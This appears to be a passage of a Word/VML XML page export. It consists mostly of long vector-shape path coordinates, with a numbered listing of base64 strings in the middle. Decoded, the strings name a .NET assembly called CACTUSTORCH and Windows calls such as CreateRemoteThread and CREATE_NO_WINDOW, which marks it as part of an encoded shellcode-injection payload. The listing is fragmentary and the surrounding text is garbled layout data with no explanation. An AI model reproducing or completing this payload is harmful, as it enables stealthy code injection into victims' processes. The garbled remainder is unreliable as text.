6,2506,14446,2509,14446,2512,14446,2515,14446,2515,14446,2515,14446,2515,14446,2515,14446,2515,14446,2515,14446,2515,14446,2515,14446,2515,14446,2515,14446,2515,14446,2515,14446,2515,14447,2515,14447,2515,14447,2515,14447,2515,14447,2515,14447,2515,14447,2515,14447,2515,14447,2515,14448,2515,14448,2515,14448,2515,14448,2515,14449,2515,14449,2515,14449,2515,14450,2515,14450,2515,14450,2515,14451,2515,14451,2515,14452,2515,14452,2515,14453,2515,14453,2515,14454,2515,14455,2515,14455,2515,14456,2515,14457,2515,14457,2515,14458,2515,14459,2515,14460,2515,14461,2515,14462,2515,14463,2515,14464,2515,14465,2515,14466,2515,14468,2515,14469,2515,14470,2515,14471,2515,14473,2515,14474,2515,14476,2515,14477,2515,14479,2515,14481,2515,14482,2515,14484,2515,14486,2515,14488,2515,14490,2515,14492,2515,14494,2515,14496,2515,14498,2515,14500,2515,14503,2515,14505,2515,14508,2515,14510,2515,14513,2515,14515,2515,14518,2515,14521,2515,14524,2515,14527,2515,14530,2515,14533,2515,14536,2515,14539,2515,14543,2515,14546,2515,14549,2515,14553,2515,14557,2515,14560,2515,14564,2515,14568,2515,14572,2515,14576,2515,14580,2515,14584,2515,14589,2515,14593,2515,14598,2515,14602,2515,14607,2515,14612,2515,14617,2515,14622,2515,14627,2515,14632,2515,14637,2515,14642,2515,14648,2515,14653,2515,14659,2515,14665,2515,14671,2515,14677,2515,14683,2515,14689,2515,14695,2515,14701,2515,14701,2515,14701,2515,14701,2515,14701,2515,14701,2515,14701,2515,14701,2515,14701,2515,14701,2515,14701,2515,14701,2515,14701,2515,14701,2515,14701,2515,14701,2515,14701,2515,14701,2515,14701,2515,14701,2515,14701,2515,14701,2515,14701,2515,14701,2514,14701,2514,14701,2514,14701,2514,14701,2514,14701,2514,14701,2514,14701,2513,14701,2513,14701,2513,14701,2513,14701,2512,14701,2512,14701,2512,14701,2512,14701,2511,14701,2511,14701,2511,14701,2510,14701,2510,14701,2510,14701,2509,14701,2509,14701,2508,14701,2508,14701,2507,14701,2507,14701,2506,14701,2506,14701,2505,14701,2505,14701,2504,14701,2503,14701,2503,14701,2502,14701,2501,14701,2501,14701,2500,14701,2499,14701,2498,14701,2497,14701,2497,14701,2496,14701,2495,14701,2494,14701,2493,14701,2492,14701,2491,14701,2490,14701,2489,14701,2488,14701,2486,14701,2485,14701,2484,14701,2483,14701,2481,14701,2480,14701,2479,14701,2477,14701,2476,14701,2475,14701,2473,14701,2472,14701,2470,14701,2468,14701,2467,14701,2465,14701,2463,14701,2462,14701,2460,14701,2458,14701,2456,14701,2454,14701,2452,14701,2450,14701,2448,14701,2446,14701,2444,14701,2442,14701,2440,14701,2437,14701,2435,14701,2433,14701,2430,14701,2428,14701,2426,14701,2423,14701,2420,14701,2418,14701,2415,14701,2412,14701,2410,14701,2407,14701,2404,14701,2401,14701,2398,14701,2395,14701,2395,14701,2395,14701,2395,14701,2395,14701,2395,14701,2395,14701,2395,14701,2395,14701,2395,14701,2395,14701,2395,14701,2395,14701,2395,14701,2395,14701,2395,14701,2395,14701,2395,14701,2395,14701,2395,14701,2395,14700,2395,14700,2395,14700,2395,14700,2395,14700,2395,14699,2395,14699,2395,14699,2395,14698,2395,14698,2395,14698,2395,14697,2395,14697,2395,14696,2395,14696,2395,14695,2395,14695,2395,14694,2395,14694,2395,14693,2395,14692,2395,14692,2395,14691,2395,14690,2395,14689,2395,14689,2395,14688,2395,14687,2395,14686,2395,14685,2395,14684,2395,14682,2395,14681,2395,14680,2395,14679,2395,14678,2395,14676,2395,14675,2395,14673,2395,14672,2395,14670,2395,14669,2395,14667,2395,14665,2395,14664,2395,14662,2395,14660,2395,14658,2395,14656,2395,14654,2395,14652,2395,14649,2395,14647,2395,14645,2395,14643,2395,14640,2395,14638,2395,14635,2395,14632,2395,14630,2395,14627,2395,14624,2395,14621,2395,14618,2395,14615,2395,14612,2395,14608,2395,14605,2395,14602,2395,14598,2395,14595,2395,14591,2395,14587,2395,14584,2395,14580,2395,14576,2395,14572,2395,14567,2395,14563,2395,14559,2395,14554,2395,14550,2395,14545,2395,14541,2395,14536,2395,14531,2395,14526,2395,14521,2395,14516,2395,14511,2395,14505,2395,14500,2395,14494,2395,14489,2395,14483,2395,14477,2395,14471,2395,14465,2395,14459,2395,14453,2395,14446e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:142.500pt;margin-top:721.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2850,14430" coordsize="130,270">
        <v:shape style="position:absolute;left:2850;top:14430;width:130;height:270" coordorigin="2850,14430" coordsize="130,270" path="m2875,14446l2875,14446,2875,14446,2875,14446,2875,14446,2875,14446,2875,14446,2875,14446,2875,14446,2875,14446,2875,14446,2876,14446,2876,14446,2876,14446,2876,14446,2876,14446,2876,14446,2876,14446,2876,14446,2876,14446,2876,14446,2876,14446,2876,14446,2876,14446,2876,14446,2876,14446,2877,14446,2877,14446,2877,14446,2877,14446,2877,14446,2877,14446,2878,14446,2878,14446,2878,14446,2878,14446,2879,14446,2879,14446,2879,14446,2879,14446,2880,14446,2880,14446,2880,14446,2881,14446,2881,14446,2882,14446,2882,14446,2882,14446,2883,14446,2883,14446,2884,14446,2884,14446,2885,14446,2885,14446,2886,14446,2887,14446,2887,14446,2888,14446,2889,14446,2889,14446,2890,14446,2891,14446,2892,14446,2892,14446,2893,14446,2894,14446,2895,14446,2896,14446,2897,14446,2898,14446,2899,14446,2900,14446,2901,14446,2902,14446,2903,14446,2904,14446,2906,14446,2907,14446,2908,14446,2909,14446,2911,14446,2912,14446,2913,14446,2915,14446,2916,14446,2918,14446,2919,14446,2921,14446,2922,14446,2924,14446,2926,14446,2927,14446,2929,14446,2931,14446,2933,14446,2935,14446,2937,14446,2938,14446,2940,14446,2943,14446,2945,14446,2947,14446,2949,14446,2951,14446,2953,14446,2956,14446,2958,14446,2960,14446,2963,14446,2965,14446,2968,14446,2970,14446,2973,14446,2976,14446,2978,14446,2981,14446,2984,14446,2987,14446,2990,14446,2993,14446,2996,14446,2996,14446,2996,14446,2996,14446,2996,14446,2996,14446,2996,14446,2996,14446,2996,14446,2996,14446,2996,14446,2996,14446,2996,14446,2996,14447,2996,14447,2996,14447,2996,14447,2996,14447,2996,14447,2996,14447,2996,14447,2996,14447,2996,14448,2996,14448,2996,14448,2996,14448,2996,14449,2996,14449,2996,14449,2996,14450,2996,14450,2996,14450,2996,14451,2996,14451,2996,14452,2996,14452,2996,14453,2996,14453,2996,14454,2996,14455,2996,14455,2996,14456,2996,14457,2996,14457,2996,14458,2996,14459,2996,14460,2996,14461,2996,14462,2996,14463,2996,14464,2996,14465,2996,14466,2996,14468,2996,14469,2996,14470,2996,14471,2996,14473,2996,14474,2996,14476,2996,14477,2996,14479,2996,14481,2996,14482,2996,14484,2996,14486,2996,14488,2996,14490,2996,14492,2996,14494,2996,14496,2996,14498,2996,14500,2996,14503,2996,14505,2996,14508,2996,14510,2996,14513,2996,14515,2996,14518,2996,14521,2996,14524,2996,14527,2996,14530,2996,14533,2996,14536,2996,14539,2996,14543,2996,14546,2996,14549,2996,14553,2996,14557,2996,14560,2996,14564,2996,14568,2996,14572,2996,14576,2996,14580,2996,14584,2996,14589,2996,14593,2996,14598,2996,14602,2996,14607,2996,14612,2996,14617,2996,14622,2996,14627,2996,14632,2996,14637,2996,14642,2996,14648,2996,14653,2996,14659,2996,14665,2996,14671,2996,14677,2996,14683,2996,14689,2996,14695,2996,14701,2996,14701,2996,14701,2996,14701,2996,14701,2996,14701,2995,14701,2995,14701,2995,14701,2995,14701,2995,14701,2995,14701,2995,14701,2995,14701,2995,14701,2995,14701,2995,14701,2995,14701,2995,14701,2995,14701,2995,14701,2995,14701,2995,14701,2995,14701,2995,14701,2995,14701,2994,14701,2994,14701,2994,14701,2994,14701,2994,14701,2994,14701,2993,14701,2993,14701,2993,14701,2993,14701,2992,14701,2992,14701,2992,14701,2992,14701,2991,14701,2991,14701,2991,14701,2990,14701,2990,14701,2989,14701,2989,14701,2989,14701,2988,14701,2988,14701,2987,14701,2987,14701,2986,14701,2985,14701,2985,14701,2984,14701,2984,14701,2983,14701,2982,14701,2982,14701,2981,14701,2980,14701,2979,14701,2979,14701,2978,14701,2977,14701,2976,14701,2975,14701,2974,14701,2973,14701,2972,14701,2971,14701,2970,14701,2969,14701,2968,14701,2967,14701,2965,14701,2964,14701,2963,14701,2962,14701,2960,14701,2959,14701,2958,14701,2956,14701,2955,14701,2953,14701,2952,14701,2950,14701,2949,14701,2947,14701,2945,14701,2944,14701,2942,14701,2940,14701,2938,14701,2936,14701,2934,14701,2932,14701,2930,14701,2928,14701,2926,14701,2924,14701,2922,14701,2920,14701,2918,14701,2915,14701,2913,14701,2911,14701,2908,14701,2906,14701,2903,14701,2901,14701,2898,14701,2895,14701,2893,14701,2890,14701,2887,14701,2884,14701,2881,14701,2878,14701,2875,14701,2875,14701,2875,14701,2875,14701,2875,14701,2875,14701,2875,14701,2875,14701,2875,14701,2875,14701,2875,14701,2875,14701,2875,14701,2875,14701,2875,14701,2875,14701,2875,14701,2875,14701,2875,14701,2875,14701,2875,14700,2875,14700,2875,14700,2875,14700,2875,14700,2875,14699,2875,14699,2875,14699,2875,14698,2875,14698,2875,14698,2875,14697,2875,14697,2875,14696,2875,14696,2875,14695,2875,14695,2875,14694,2875,14694,2875,14693,2875,14692,2875,14692,2875,14691,2875,14690,2875,14689,2875,14689,2875,14688,2875,14687,2875,14686,2875,14685,2875,14684,2875,14682,2875,14681,2875,14680,2875,14679,2875,14678,2875,14676,2875,14675,2875,14673,2875,14672,2875,14670,2875,14669,2875,14667,2875,14665,2875,14664,2875,14662,2875,14660,2875,14658,2875,14656,2875,14654,2875,14652,2875,14649,2875,14647,2875,14645,2875,14643,2875,14640,2875,14638,2875,14635,2875,14632,2875,14630,2875,14627,2875,14624,2875,14621,2875,14618,2875,14615,2875,14612,2875,14608,2875,14605,2875,14602,2875,14598,2875,14595,2875,14591,2875,14587,2875,14584,2875,14580,2875,14576,2875,14572,2875,14567,2875,14563,2875,14559,2875,14554,2875,14550,2875,14545,2875,14541,2875,14536,2875,14531,2875,14526,2875,14521,2875,14516,2875,14511,2875,14505,2875,14500,2875,14494,2875,14489,2875,14483,2875,14477,2875,14471,2875,14465,2875,14459,2875,14453,2875,14446e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:118.500pt;margin-top:752.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2370,15050" coordsize="130,270">
        <v:shape style="position:absolute;left:2370;top:15050;width:130;height:270" coordorigin="2370,15050" coordsize="130,270" path="m2395,15077l2395,15077,2395,15077,2395,15077,2395,15077,2395,15077,2395,15077,2395,15077,2395,15077,2395,15077,2395,15077,2395,15077,2395,15077,2395,15077,2395,15077,2395,15077,2395,15077,2395,15077,2396,15077,2396,15077,2396,15077,2396,15077,2396,15077,2396,15077,2396,15077,2396,15077,2396,15077,2396,15077,2397,15077,2397,15077,2397,15077,2397,15077,2397,15077,2398,15077,2398,15077,2398,15077,2398,15077,2399,15077,2399,15077,2399,15077,2399,15077,2400,15077,2400,15077,2400,15077,2401,15077,2401,15077,2402,15077,2402,15077,2403,15077,2403,15077,2404,15077,2404,15077,2405,15077,2405,15077,2406,15077,2406,15077,2407,15077,2408,15077,2408,15077,2409,15077,2410,15077,2411,15077,2411,15077,2412,15077,2413,15077,2414,15077,2415,15077,2416,15077,2417,15077,2418,15077,2419,15077,2420,15077,2421,15077,2422,15077,2423,15077,2424,15077,2425,15077,2426,15077,2428,15077,2429,15077,2430,15077,2432,15077,2433,15077,2434,15077,2436,15077,2437,15077,2439,15077,2441,15077,2442,15077,2444,15077,2445,15077,2447,15077,2449,15077,2451,15077,2453,15077,2454,15077,2456,15077,2458,15077,2460,15077,2462,15077,2464,15077,2466,15077,2469,15077,2471,15077,2473,15077,2475,15077,2478,15077,2480,15077,2482,15077,2485,15077,2487,15077,2490,15077,2493,15077,2495,15077,2498,15077,2501,15077,2504,15077,2506,15077,2509,15077,2512,15077,2515,15077,2515,15077,2515,15077,2515,15077,2515,15077,2515,15077,2515,15077,2515,15077,2515,15077,2515,15077,2515,15077,2515,15077,2515,15077,2515,15077,2515,15077,2515,15077,2515,15077,2515,15077,2515,15077,2515,15077,2515,15078,2515,15078,2515,15078,2515,15078,2515,15078,2515,15079,2515,15079,2515,15079,2515,15080,2515,15080,2515,15080,2515,15081,2515,15081,2515,15082,2515,15082,2515,15083,2515,15083,2515,15084,2515,15084,2515,15085,2515,15086,2515,15086,2515,15087,2515,15088,2515,15089,2515,15089,2515,15090,2515,15091,2515,15092,2515,15093,2515,15094,2515,15096,2515,15097,2515,15098,2515,15099,2515,15100,2515,15102,2515,15103,2515,15105,2515,15106,2515,15108,2515,15109,2515,15111,2515,15113,2515,15114,2515,15116,2515,15118,2515,15120,2515,15122,2515,15124,2515,15126,2515,15129,2515,15131,2515,15133,2515,15135,2515,15138,2515,15140,2515,15143,2515,15146,2515,15148,2515,15151,2515,15154,2515,15157,2515,15160,2515,15163,2515,15166,2515,15170,2515,15173,2515,15176,2515,15180,2515,15183,2515,15187,2515,15191,2515,15194,2515,15198,2515,15202,2515,15206,2515,15211,2515,15215,2515,15219,2515,15223,2515,15228,2515,15233,2515,15237,2515,15242,2515,15247,2515,15252,2515,15257,2515,15262,2515,15267,2515,15273,2515,15278,2515,15284,2515,15289,2515,15295,2515,15301,2515,15307,2515,15313,2515,15319,2515,15325,2515,15332,2515,15332,2515,15332,2515,15332,2515,15332,2515,15332,2515,15332,2515,15332,2515,15332,2515,15332,2515,15332,2515,15332,2515,15332,2515,15332,2515,15332,2515,15332,2515,15332,2515,15332,2515,15332,2515,15332,2515,15332,2515,15332,2515,15332,2515,15332,2514,15332,2514,15332,2514,15332,2514,15332,2514,15332,2514,15332,2514,15332,2513,15332,2513,15332,2513,15332,2513,15332,2512,15332,2512,15332,2512,15332,2512,15332,2511,15332,2511,15332,2511,15332,2510,15332,2510,15332,2510,15332,2509,15332,2509,15332,2508,15332,2508,15332,2507,15332,2507,15332,2506,15332,2506,15332,2505,15332,2505,15332,2504,15332,2503,15332,2503,15332,2502,15332,2501,15332,2501,15332,2500,15332,2499,15332,2498,15332,2497,15332,2497,15332,2496,15332,2495,15332,2494,15332,2493,15332,2492,15332,2491,15332,2490,15332,2489,15332,2488,15332,2486,15332,2485,15332,2484,15332,2483,15332,2481,15332,2480,15332,2479,15332,2477,15332,2476,15332,2475,15332,2473,15332,2472,15332,2470,15332,2468,15332,2467,15332,2465,15332,2463,15332,2462,15332,2460,15332,2458,15332,2456,15332,2454,15332,2452,15332,2450,15332,2448,15332,2446,15332,2444,15332,2442,15332,2440,15332,2437,15332,2435,15332,2433,15332,2430,15332,2428,15332,2426,15332,2423,15332,2420,15332,2418,15332,2415,15332,2412,15332,2410,15332,2407,15332,2404,15332,2401,15332,2398,15332,2395,15332,2395,15332,2395,15332,2395,15332,2395,15332,2395,15332,2395,15332,2395,15332,2395,15332,2395,15332,2395,15332,2395,15332,2395,15332,2395,15331,2395,15331,2395,15331,2395,15331,2395,15331,2395,15331,2395,15331,2395,15331,2395,15331,2395,15330,2395,15330,2395,15330,2395,15330,2395,15329,2395,15329,2395,15329,2395,15328,2395,15328,2395,15328,2395,15327,2395,15327,2395,15326,2395,15326,2395,15325,2395,15325,2395,15324,2395,15323,2395,15323,2395,15322,2395,15321,2395,15320,2395,15320,2395,15319,2395,15318,2395,15317,2395,15316,2395,15315,2395,15314,2395,15313,2395,15312,2395,15310,2395,15309,2395,15308,2395,15307,2395,15305,2395,15304,2395,15302,2395,15301,2395,15299,2395,15297,2395,15296,2395,15294,2395,15292,2395,15290,2395,15288,2395,15286,2395,15284,2395,15282,2395,15280,2395,15278,2395,15275,2395,15273,2395,15270,2395,15268,2395,15265,2395,15263,2395,15260,2395,15257,2395,15254,2395,15251,2395,15248,2395,15245,2395,15242,2395,15239,2395,15235,2395,15232,2395,15229,2395,15225,2395,15221,2395,15218,2395,15214,2395,15210,2395,15206,2395,15202,2395,15198,2395,15194,2395,15189,2395,15185,2395,15180,2395,15176,2395,15171,2395,15166,2395,15161,2395,15156,2395,15151,2395,15146,2395,15141,2395,15136,2395,15130,2395,15125,2395,15119,2395,15113,2395,15107,2395,15101,2395,15095,2395,15089,2395,15083,2395,15077e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:142.500pt;margin-top:752.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2850,15050" coordsize="130,270">
        <v:shape style="position:absolute;left:2850;top:15050;width:130;height:270" coordorigin="2850,15050" coordsize="130,270" path="m2875,15077l2875,15077,2875,15077,2875,15077,2875,15077,2875,15077,2875,15077,2875,15077,2875,15077,2875,15077,2875,15077,2876,15077,2876,15077,2876,15077,2876,15077,2876,15077,2876,15077,2876,15077,2876,15077,2876,15077,2876,15077,2876,15077,2876,15077,2876,15077,2876,15077,2876,15077,2877,15077,2877,15077,2877,15077,2877,15077,2877,15077,2877,15077,2878,15077,2878,15077,2878,15077,2878,15077,2879,15077,2879,15077,2879,15077,2879,15077,2880,15077,2880,15077,2880,15077,2881,15077,2881,15077,2882,15077,2882,15077,2882,15077,2883,15077,2883,15077,2884,15077,2884,15077,2885,15077,2885,15077,2886,15077,2887,15077,2887,15077,2888,15077,2889,15077,2889,15077,2890,15077,2891,15077,2892,15077,2892,15077,2893,15077,2894,15077,2895,15077,2896,15077,2897,15077,2898,15077,2899,15077,2900,15077,2901,15077,2902,15077,2903,15077,2904,15077,2906,15077,2907,15077,2908,15077,2909,15077,2911,15077,2912,15077,2913,15077,2915,15077,2916,15077,2918,15077,2919,15077,2921,15077,2922,15077,2924,15077,2926,15077,2927,15077,2929,15077,2931,15077,2933,15077,2935,15077,2937,15077,2938,15077,2940,15077,2943,15077,2945,15077,2947,15077,2949,15077,2951,15077,2953,15077,2956,15077,2958,15077,2960,15077,2963,15077,2965,15077,2968,15077,2970,15077,2973,15077,2976,15077,2978,15077,2981,15077,2984,15077,2987,15077,2990,15077,2993,15077,2996,15077,2996,15077,2996,15077,2996,15077,2996,15077,2996,15077,2996,15077,2996,15077,2996,15077,2996,15077,2996,15077,2996,15077,2996,15077,2996,15077,2996,15077,2996,15077,2996,15077,2996,15077,2996,15077,2996,15077,2996,15078,2996,15078,2996,15078,2996,15078,2996,15078,2996,15079,2996,15079,2996,15079,2996,15080,2996,15080,2996,15080,2996,15081,2996,15081,2996,15082,2996,15082,2996,15083,2996,15083,2996,15084,2996,15084,2996,15085,2996,15086,2996,15086,2996,15087,2996,15088,2996,15089,2996,15089,2996,15090,2996,15091,2996,15092,2996,15093,2996,15094,2996,15096,2996,15097,2996,15098,2996,15099,2996,15100,2996,15102,2996,15103,2996,15105,2996,15106,2996,15108,2996,15109,2996,15111,2996,15113,2996,15114,2996,15116,2996,15118,2996,15120,2996,15122,2996,15124,2996,15126,2996,15129,2996,15131,2996,15133,2996,15135,2996,15138,2996,15140,2996,15143,2996,15146,2996,15148,2996,15151,2996,15154,2996,15157,2996,15160,2996,15163,2996,15166,2996,15170,2996,15173,2996,15176,2996,15180,2996,15183,2996,15187,2996,15191,2996,15194,2996,15198,2996,15202,2996,15206,2996,15211,2996,15215,2996,15219,2996,15223,2996,15228,2996,15233,2996,15237,2996,15242,2996,15247,2996,15252,2996,15257,2996,15262,2996,15267,2996,15273,2996,15278,2996,15284,2996,15289,2996,15295,2996,15301,2996,15307,2996,15313,2996,15319,2996,15325,2996,15332,2996,15332,2996,15332,2996,15332,2996,15332,2996,15332,2995,15332,2995,15332,2995,15332,2995,15332,2995,15332,2995,15332,2995,15332,2995,15332,2995,15332,2995,15332,2995,15332,2995,15332,2995,15332,2995,15332,2995,15332,2995,15332,2995,15332,2995,15332,2995,15332,2995,15332,2994,15332,2994,15332,2994,15332,2994,15332,2994,15332,2994,15332,2993,15332,2993,15332,2993,15332,2993,15332,2992,15332,2992,15332,2992,15332,2992,15332,2991,15332,2991,15332,2991,15332,2990,15332,2990,15332,2989,15332,2989,15332,2989,15332,2988,15332,2988,15332,2987,15332,2987,15332,2986,15332,2985,15332,2985,15332,2984,15332,2984,15332,2983,15332,2982,15332,2982,15332,2981,15332,2980,15332,2979,15332,2979,15332,2978,15332,2977,15332,2976,15332,2975,15332,2974,15332,2973,15332,2972,15332,2971,15332,2970,15332,2969,15332,2968,15332,2967,15332,2965,15332,2964,15332,2963,15332,2962,15332,2960,15332,2959,15332,2958,15332,2956,15332,2955,15332,2953,15332,2952,15332,2950,15332,2949,15332,2947,15332,2945,15332,2944,15332,2942,15332,2940,15332,2938,15332,2936,15332,2934,15332,2932,15332,2930,15332,2928,15332,2926,15332,2924,15332,2922,15332,2920,15332,2918,15332,2915,15332,2913,15332,2911,15332,2908,15332,2906,15332,2903,15332,2901,15332,2898,15332,2895,15332,2893,15332,2890,15332,2887,15332,2884,15332,2881,15332,2878,15332,2875,15332,2875,15332,2875,15332,2875,15332,2875,15332,2875,15332,2875,15332,2875,15332,2875,15332,2875,15332,2875,15332,2875,15332,2875,15332,2875,15331,2875,15331,2875,15331,2875,15331,2875,15331,2875,15331,2875,15331,2875,15331,2875,15331,2875,15330,2875,15330,2875,15330,2875,15330,2875,15329,2875,15329,2875,15329,2875,15328,2875,15328,2875,15328,2875,15327,2875,15327,2875,15326,2875,15326,2875,15325,2875,15325,2875,15324,2875,15323,2875,15323,2875,15322,2875,15321,2875,15320,2875,15320,2875,15319,2875,15318,2875,15317,2875,15316,2875,15315,2875,15314,2875,15313,2875,15312,2875,15310,2875,15309,2875,15308,2875,15307,2875,15305,2875,15304,2875,15302,2875,15301,2875,15299,2875,15297,2875,15296,2875,15294,2875,15292,2875,15290,2875,15288,2875,15286,2875,15284,2875,15282,2875,15280,2875,15278,2875,15275,2875,15273,2875,15270,2875,15268,2875,15265,2875,15263,2875,15260,2875,15257,2875,15254,2875,15251,2875,15248,2875,15245,2875,15242,2875,15239,2875,15235,2875,15232,2875,15229,2875,15225,2875,15221,2875,15218,2875,15214,2875,15210,2875,15206,2875,15202,2875,15198,2875,15194,2875,15189,2875,15185,2875,15180,2875,15176,2875,15171,2875,15166,2875,15161,2875,15156,2875,15151,2875,15146,2875,15141,2875,15136,2875,15130,2875,15125,2875,15119,2875,15113,2875,15107,2875,15101,2875,15095,2875,15089,2875,15083,2875,15077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86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110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"WV9DTEFTUwBOT0FDQ0VTUwBEVVBMSUNBVEVfU0FNRV9BQ0NFU1MAREVUQUNI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RURf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UFJPQ0VTUwBD"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111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"UkVBVEVfUFJPVEVDVEVEX1BST0NFU1MAREVCVUdfUFJPQ0VTUwBERUJVR19P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TkxZ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X1RISVNfUFJP"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112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"Q0VTUwBSRVNFVABDT01NSVQAQ1JFQVRFX0lHTk9SRV9TWVNURU1fREVGQVVM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VABD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UkVBVEVfVU5J"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113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"Q09ERV9FTlZJUk9OTUVOVABFWFRFTkRFRF9TVEFSVFVQSU5GT19QUkVTRU5U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AENS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RUFURV9OT19X"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114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"SU5ET1cAZHdYAFJFQURPTkxZAEVYRUNVVEVfV1JJVEVDT1BZAElOSEVSSVRf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UEFS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RU5UX0FGRklO"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115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"SVRZAElOSEVSSVRfQ0FMTEVSX1BSSU9SSVRZAGR3WQB2YWx1ZV9fAGNiAG1z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Y29y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bGliAGxwVGhy"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116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"ZWFkSWQAZHdUaHJlYWRJZABkd1Byb2Nlc3NJZABDcmVhdGVSZW1vdGVUaHJl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YWQA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aFRocmVhZABs"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117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"cFJlc2VydmVkAHVFeGl0Q29kZQBHZXRFbnZpcm9ubWVudFZhcmlhYmxlAGxw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SGFu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ZGxlAGJJbmhl"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118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"cml0SGFuZGxlAGxwVGl0bGUAbHBBcHBsaWNhdGlvbk5hbWUAZmxhbWUAbHBD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b21t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YW5kTGluZQBW"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119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"YWx1ZVR5cGUAZmxBbGxvY2F0aW9uVHlwZQBHdWlkQXR0cmlidXRlAERlYnVn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Z2Fi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bGVBdHRyaWJ1"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120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"dGUAQ29tVmlzaWJsZUF0dHJpYnV0ZQBBc3NlbWJseVRpdGxlQXR0cmlidXRl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AEFz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c2VtYmx5VHJh"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121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"ZGVtYXJrQXR0cmlidXRlAGR3RmlsbEF0dHJpYnV0ZQBBc3NlbWJseUZpbGVW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ZXJz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aW9uQXR0cmli"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122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"dXRlAEFzc2VtYmx5Q29uZmlndXJhdGlvbkF0dHJpYnV0ZQBBc3NlbWJseURl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c2Ny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aXB0aW9uQXR0"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123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"cmlidXRlAEZsYWdzQXR0cmlidXRlAENvbXBpbGF0aW9uUmVsYXhhdGlvbnNB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dHRy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aWJ1dGUAQXNz"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124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"ZW1ibHlQcm9kdWN0QXR0cmlidXRlAEFzc2VtYmx5Q29weXJpZ2h0QXR0cmli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dXRl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AEFzc2VtYmx5"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125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"Q29tcGFueUF0dHJpYnV0ZQBSdW50aW1lQ29tcGF0aWJpbGl0eUF0dHJpYnV0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ZQBk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d1hTaXplAGR3"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126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"WVNpemUAZHdTdGFja1NpemUAZHdTaXplAFNpemVPZgBHVUFSRF9Nb2RpZmll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cmZs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YWcATk9DQUNI"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127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"RV9Nb2RpZmllcmZsYWcAV1JJVEVDT01CSU5FX01vZGlmaWVyZmxhZwBGcm9t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QmFz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ZTY0U3RyaW5n"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128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"AFRvU3RyaW5nAGNhY3R1c1RvcmNoAGdldF9MZW5ndGgATWFyc2hhbABrZXJu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ZWwz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Mi5kbGwAQ0FD"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129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"VFVTVE9SQ0guZGxsAFN5c3RlbQBFbnVtAGxwTnVtYmVyT2ZCeXRlc1dyaXR0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ZW4A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bHBQcm9jZXNz"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130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"SW5mb3JtYXRpb24AU3lzdGVtLlJlZmxlY3Rpb24ATWVtb3J5UHJvdGVjdGlv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bgBs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cFN0YXJ0dXBJ"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131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"bmZvAFplcm8AbHBEZXNrdG9wAGJ1ZmZlcgBscFBhcmFtZXRlcgBoU3RkRXJy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b3IA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LmN0b3IAbHBT"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132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"ZWN1cml0eURlc2NyaXB0b3IASW50UHRyAFN5c3RlbS5EaWFnbm9zdGljcwBT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eXN0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ZW0uUnVudGlt"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842.0pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="10402,0" coordsize="0,16840">
        <v:shape style="position:absolute;left:10402;top:0;width:0;height:16840" coordorigin="10402,0" coordsize="0,16840" path="m10402,0l10402,0,10402,0,10402,0,10402,0,10402,0,10402,1,10402,2,10402,3,10402,5,10402,7,10402,9,10402,13,10402,17,10402,21,10402,27,10402,33,10402,40,10402,49,10402,58,10402,68,10402,79,10402,92,10402,106,10402,121,10402,138,10402,156,10402,175,10402,196,10402,219,10402,243,10402,269,10402,297,10402,327,10402,359,10402,392,10402,428,10402,466,10402,506,10402,548,10402,592,10402,639,10402,688,10402,740,10402,794,10402,851,10402,910,10402,972,10402,1037,10402,1105,10402,1175,10402,1249,10402,1325,10402,1405,10402,1487,10402,1573,10402,1662,10402,1754,10402,1850,10402,1949,10402,2052,10402,2158,10402,2268,10402,2381,10402,2498,10402,2619,10402,2744,10402,2872,10402,3005,10402,3142,10402,3282,10402,3427,10402,3576,10402,3729,10402,3887,10402,4049,10402,4215,10402,4386,10402,4562,10402,4742,10402,4927,10402,5116,10402,5310,10402,5509,10402,5713,10402,5922,10402,6137,10402,6356,10402,6580,10402,6810,10402,7044,10402,7284,10402,7530,10402,7781,10402,8038,10402,8300,10402,8567,10402,8841,10402,9120,10402,9405,10402,9696,10402,9993,10402,10295,10402,10604,10402,10919,10402,11240,10402,11568,10402,11901,10402,12242,10402,12588,10402,12941,10402,13300,10402,13666,10402,14039,10402,14419,10402,14805,10402,15198,10402,15598,10402,16005,10402,16419,10402,16840e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:48.500pt;width:449.500pt;height:33.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,970" coordsize="8990,670">
        <v:shape style="position:absolute;left:1490;top:970;width:8990;height:670" coordorigin="1490,970" coordsize="8990,670" 